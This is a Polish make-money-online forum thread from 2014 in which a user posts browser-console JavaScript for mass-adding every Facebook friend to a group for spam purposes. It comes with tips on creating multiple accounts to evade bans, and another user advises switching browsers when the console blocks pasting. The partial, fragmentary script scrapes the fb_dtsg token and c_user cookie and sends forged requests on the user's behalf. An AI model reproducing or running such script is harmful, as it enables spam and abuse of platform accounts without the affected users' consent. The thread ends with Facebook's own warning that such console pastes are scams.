Witaj gościu! Zaloguj się lub Zarejestruj aby móc korzystać ze wszystkich funkcjonalności jakie oferuje to forum! Rozpocznij zarabianie przez internet, poznaj korzysci pracy w domu! Rejestracja i korzystanie z forum jest całkowicie darmowe!
Witaj! Nie bez powodu trafiłeś na największe w Polsce Forum o Zarabianiu przez internet! Tutaj gromadzimy pasjonatów zdobywania pieniędzy online i dajemy możliwość poznania tajników pracy w domu. Coraz więcej osób poszukuje sposobów na zarabianie w sieci, co sprawia, że praca w domu przez internet staje się atrakcyjnym źródłem dochodu. W dzisiejszych czasach, zarabianie online to nie tylko alternatywa, ale często również znakomita opcja do tradycyjnej pracy na etacie.
Czy zastanawiasz się, jak łatwo zarobić pieniądze? Jeśli tak, to właściwe miejsce! Internet jest pełen możliwości, a my jesteśmy tutaj, aby Ci pomóc, dzieląc się wiedzą i doświadczeniami.
Rejestracja na naszym forum jest całkowicie darmowa i niesie ze sobą wiele korzyści:
Zakładaj nowe wątki i bierz udział w dyskusjach,
Odblokuj dostęp do czatu (Shoutbox),
Ogranicz liczbę wyświetlanych reklam,
Zdobywaj odznaczenia i reputację,
Zyskaj dostęp do ukrytych działów, tematów i linków,
Przeglądaj galerię zdjęć i filmów z wygranymi nagrodami,
Dostosuj swój prywatny profil,
Weź udział w konkursach organizowanych na forum,
Skorzystaj z doświadczenia społeczności zarabiającej online od lat,
Porównaj stopy procentowe na kontach oszczędnościowych,
Wykorzystaj merytoryczną wiedzę naszych użytkowników, by zarabianie w domu stało się łatwiejsze niż kiedykolwiek,
Dowiedz się, gdzie zdobyć darmowe upominki, gadżety i próbki.
Pamiętaj to nic nie kosztuje, zarabiam.com to darmowe forum internetowe w którym zasięgniesz informacji "jak zarabiać przez internet".
I co najważniejsze, wszystko to jest zupełnie za darmo! Zarabiam.com to internetowe forum, które udzieli Ci odpowiedzi na pytanie "jak zarabiać przez internet". Teraz praca w domu staje się możliwa! Zarejestruj się już teraz, a dowiesz się wszystkiego o zarabianiu przez internet!
Spam na facebooku stał się ostatnio bardzo popularny, skoro już wszystko jest zaspamowane syfem, to zaspamujmy teraz facebooka GRUPAMI!!
A więc:
1. Tworzymy grupę facebook, ustawiamy ikonkę.
2. Na stronie naszej grupy klikamy F12 i z panelu Developera który wysunie się na dole przeglądarki, wybieramy 'Console'.
3. Wklejamy tam poniższy kod:
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}
a("");
a("");
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};
i zatwierdzamy przyciskiem ENTER.
Teraz wszyscy znajomi z naszego konta zostaną dodani do grupy facebook.
Nie jestem autorem kodu, gdzieś go kiedyś znalazłem, a że szykuje się na formata to się odkopał, więc przetestowałem, działa, więc wklejam.
UWAGA!!!
Najlepiej stworzyć kilka kont facebook, zaprosić DO 500 znajomych i wtedy tak tworzyć grupę, gdyż jeżeli przekroczymy liczbę 500 - 800 dodanych znajomych, facebook da nam blokadę na 14 dni. Dlatego lepiej dodawać z wielu konto po 500-600 osób.
Dodam od siebie że na 100% 801 znajomy da nam w 100% blokadę na FB także trzymajcie się tego co surfer napisał ponieważ po co poblokować sobie konta ;/
Glosy:
01-11-2014 16:24
therin
Aktywny
Liczba postów: 203
Dołączył: Oct 2011
Reputacja:
61 Odznaczenia: (Zobacz Odznaczenia) Poziom:
Forum Gold: 20.00
Temat dla mnie znany długo, sam już kminiłem jak zarobić na tych grupach. Skończyło się tak, że jedną sprzedam kilka oddałem
@EDIT
Z tego co mi się przypomniało jakiś czas temu na wersji Firefox 31 nie można było już wklejać tekstu do konsolki. Nie wiem jak teraz bo jest nowa wersja FIREFOX 33. PS. jak wam nie będzie działało wklejanie na fireforxie zmieniajcie przeglądarkę i działajcie dalej..
Ta funkcja przeglądarki jest przeznaczona dla twórców aplikacji. Jeżeli ktoś polecił Ci skopiować i wkleić tu coś, aby włączyć funkcję Facebooka lub włamać się na czyjeś konto, jest to oszustwo mające na celu uzyskanie dostępu do Twojego konta na Facebooku.